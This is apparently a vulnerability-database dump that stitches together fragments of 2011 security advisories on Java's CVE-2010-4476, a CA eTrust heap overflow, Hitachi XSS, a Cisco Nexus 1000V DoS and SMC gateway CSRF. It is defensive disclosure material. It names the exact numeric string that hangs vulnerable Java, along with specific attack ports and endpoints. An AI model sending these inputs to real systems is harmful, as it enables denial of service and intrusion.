HP OpenVMS running Java SE 6 on Alpha and I64 platforms: v 6.0-2 and earlier. Such input strings represent valid
numbers and can be contained in data supplied by an attacker over the
network, leading to a denial-of-service attack.
For the old stable distribution (lenny), this problem has been fixed
in version 6b18-1.8.3-2~lenny1.
Note that this update introduces an OpenJDK package based on the
IcedTea release 1.8.3 into the old stable distribution. This
addresses several dozen security vulnerabilities, most of which are
only exploitable by malicious mobile code. A notable exception is
CVE-2009-3555, the TLS renegotiation vulnerability. This update
implements the protocol extension described in RFC 5746, addressing
this issue.
This update also includes a new version of Hotspot, the Java virtual
machine, which increases the default heap size on machines with
several GB of RAM. If you run several JVMs on the same machine, you
might have to reduce the heap size by specifying a suitable -Xmx
argument in the invocation of the "java" command.
We recommend that you upgrade your openjdk-6 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBAgAGBQJNWYxEAAoJEL97/wQC1SS+CagH/A5ZISN49R7V3wFLfwY822Zg
p26TG4ZaVkFpSWqVufTX5p0ryK/apwNfklol0rQamXDEOOAYOM7+izl9lGHDzJwj
Icsjfpq25XEu/BKRQW2fiK4oHJ2Gv+Y3+2sluriJQ9yK53R405DHkd31QzjdgTxm
t+Ty2eJ0NoaarC5/jltUkEUbDqG1jax7wOcretNIP4EmdVjyXXQL4wdQlPU002Hr
CROFRsrcYBY5sIrMJoSqA8wW3rlhcmHW7ewMC4HsYN02KkPKrtDM9CPtTtBkjlJG
+wHqaGmWWV98rSmRUuexI82kNL2f6t7FPYAKEmlCO9LzETVqB8b63FAoz9cbRwc=
=GQ3R
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. The Tomcat-based Servlet Engine is contained in the HP-UX Apache Web Server Suite.
The updates are available for download from http://software.hp.com
Note: HP-UX Web Server Suite v3.20 contains HP-UX Tomcat-based Servlet Engine v5.5.34.01
Web Server Suite Version
Apache Depot name
HP-UX Web Server Suite v.3.20
HP-UX B.11.23 HPUXWS22ATW-B320-64.depot
HP-UX B.11.23 HPUXWS22ATW-B320-32.depot
HP-UX B.11.31 HPUXWS22ATW-B320-64.depot
HP-UX B.11.31 HPUXWS22ATW-B320-32.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.20 or subsequent. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02729756
Version: 1
HPSBUX02633 SSRT100387 rev.1 - HP-UX running Java, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-02-23
Last Updated: 2011-02-23
------------------------------------------------------------------------------
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP-UX running Java. The vulnerability could be remotely exploited to create a Denial of Service (DoS).
References: CVE-2010-4476
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Any version of Java running on HP-UX 11.11, HP-UX 11.23, or HP-UX 11.31.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software tool available to resolve the vulnerability. This tool can be used to update all versions of HP-UX Java.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool
An HP Passport user ID is required to download the FPUpdater tool and its Readme file. For information on registering for an HP Passport user ID, refer to: https://passport2.hp.com
MANUAL ACTIONS: Yes - Update
Update using FPUpdater
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
===========
action: update using FPUpdater if Java is installed
END AFFECTED VERSIONS
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
HISTORY
Version:1 (rev.1) - 23 February 2011 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk1sQl4ACgkQ4B86/C0qfVkZoACg+A0Nrllhsgj+ZNVRWBJtSGg0
+McAoLe5aV6VZ16dYIp6IG59vPG8unq8
=sL4p
-----END PGP SIGNATURE-----
. ===========================================================
Ubuntu Security Notice USN-1079-3 March 17, 2011
openjdk-6b18 vulnerabilities
CVE-2010-4448, CVE-2010-4450, CVE-2010-4465, CVE-2010-4469,
CVE-2010-4470, CVE-2010-4471, CVE-2010-4472, CVE-2010-4476,
CVE-2011-0706
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 10.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 10.10:
icedtea6-plugin 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu2.1
After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.
Details follow:
USN-1079-2 fixed vulnerabilities in OpenJDK 6 for armel (ARM)
architectures in Ubuntu 9.10 and Ubuntu 10.04 LTS. This update fixes
vulnerabilities in OpenJDK 6 for armel (ARM) architectures for Ubuntu
10.10.
Original advisory details:
It was discovered that untrusted Java applets could create domain
name resolution cache entries, allowing an attacker to manipulate
name resolution within the JVM. (CVE-2010-4448)
It was discovered that the Java launcher did not did not properly
setup the LD_LIBRARY_PATH environment variable. A local attacker
could exploit this to execute arbitrary code as the user invoking
the program. (CVE-2010-4450)
It was discovered that within the Swing library, forged timer events
could allow bypass of SecurityManager checks. This could allow an
attacker to access restricted resources. (CVE-2010-4465)
It was discovered that certain bytecode combinations confused memory
management within the HotSpot JVM. This could allow an attacker to
cause a denial of service through an application crash or possibly
inject code. (CVE-2010-4469)
It was discovered that the way JAXP components were handled
allowed them to be manipulated by untrusted applets. An attacker
could use this to bypass XML processing restrictions and elevate
privileges. (CVE-2010-4470)
It was discovered that the Java2D subcomponent, when processing broken
CFF fonts could leak system properties. (CVE-2010-4471)
It was discovered that a flaw in the XML Digital Signature
component could allow an attacker to cause untrusted code to
replace the XML Digital Signature Transform or C14N algorithm
implementations. (CVE-2010-4472)
Konstantin Prei\xdfer and others discovered that specific double literals
were improperly handled, allowing a remote attacker to cause a denial
of service. (CVE-2010-4476)
It was discovered that the JNLPClassLoader class when handling multiple
signatures allowed remote attackers to gain privileges due to the
assignment of an inappropriate security descriptor. (CVE-2011-0706)
Updated packages for Ubuntu 10.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.diff.gz
Size/MD5: 149561 b35ae7a82db49282379d36e7ece58484
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.dsc
Size/MD5: 3015 04cb459aeaab6c228e722caf07a44de9
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 377802 d4439da20492eafbccb33e2fe979e8c9
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 78338 7bdf93e00fd81dc82fd0d9a8b4e905c7
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 85497146 1512e0d6563dd5120729cf5b993c618c
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1545620 544c54891d44bdac534c81318a7f2bcb
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 9140042 0a2d6ed937081800baeb6fc55326a754
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 30092886 4cc5ad7c54638278e55ee7d2acaab413
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 266102 4278c2c06387cf883325356efda3c4d4
http://ports.ubuntu.com/pool/universe/o/openjdk-6b18/openjdk-6-jre-zero_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1959296 6becfb4d5a2ecbe7aee622b84df57f12
. Customers should open a support case to request the
following hotfixes.
NNMi Version / Operating System
Required Patch
Hotfix
9.1x HP-UX
Patch 4
Hotfix-NNMi-9.1xP4-HP-UX-JDK-20120710.zip
9.1x Linux
Patch 4
Hotfix-NNMi-9.1xP4-Linux-JDK-20120523.zip
9.1x Solaris
Patch 4
Hotfix-NNMi-9.1xP4-Solaris-JDK-20120523.zip
9.1x Windows
Patch 4
Hotfix-NNMi-9.1xP4-Windows-JDK-20120523.zip
Note: The hotfix must be installed after the required patch. The hotfix must
be reinstalled if the required patch is reinstalled.
MANUAL ACTIONS: Yes - Update
Install the applicable patch and hotfix. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases.
The vulnerability is caused due to an error in the "doubleValue()"
method in FloatingDecimal.java when converting
"2.2250738585072012e-308" from a string type to a double precision
binary floating point and can be exploited to cause an infinite
loop.
* Sun JDK 5.0 Update 27 and prior.
* Sun SDK 1.4.2_29 and prior.
SOLUTION:
Apply patch via the FPUpdater tool
| VAR-201102-0158 | CVE-2011-0758 | CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID:
SA43200
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43200/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE:
2011-02-10
DISCUSS ADVISORY:
http://secunia.com/advisories/43200/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43200/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in CA Secure Content Manager, which
can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to missing input validation in the
eTrust Common Services Transport (ECSQdmn.exe) service when parsing
requests and can be exploited to cause a heap-based buffer overflow
via a specially crafted request sent to port 1882.
* CA Gateway Security version 8.1.
SOLUTION:
Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY:
Sebastian Apelt via ZDI.
ORIGINAL ADVISORY:
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID:
CVE-2011-0758
-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors:
CA
-- Affected Products:
CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2011-02-07 - Public release of advisory
-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0385 | No CVE | Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA43209
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43209/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
RELEASE DATE:
2011-02-08
DISCUSS ADVISORY:
http://secunia.com/advisories/43209/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43209/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43209
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Hitachi Tuning Manager, which
can be exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and
7.0.0 running on Windows and Solaris.
SOLUTION:
Update to version 6.4.0-02 or 7.0.0-01.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-002:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0213 | CVE-2011-0355 | Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.
The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)
The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of
service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355
- ------------------------------------------------------------------------
1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a
denial
of service in VMware ESX/ESXi.
2. Problem Description
a. This switch can be added to ESX and ESXi
where it replaces the VMware virtual switch and runs as part of the
ESX and ESXi kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they
have chosen to deploy the Cisco Nexus 1000V virtual switch as a
replacement for the VMware vNetwork Standard Switch or the VMware
vNetwork Distributed Switch.
VMware has confirmed that the VMware vNetwork Standard Switch and
the VMware vNetwork Distributed Switch are not affected by the
vulnerability.
The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see
section 5 for a link).
4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fe
tchBugDetails&bugId=CSCtj17451
- ------------------------------------------------------------------------
6.
- -----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP
FHYGA7W1DEcKcOFWj7GkuHE=
=srWD
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of
Service
SECUNIA ADVISORY ID:
SA43084
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43084/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43084/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43084/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43084
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Cisco Nexus 1000V, which can be
exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing 802.1Q
tagged packets. This can be exploited to cause a crash when a virtual
machine sends a packet on a vEthernet port.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451):
http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0084 | CVE-2011-0886 | SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
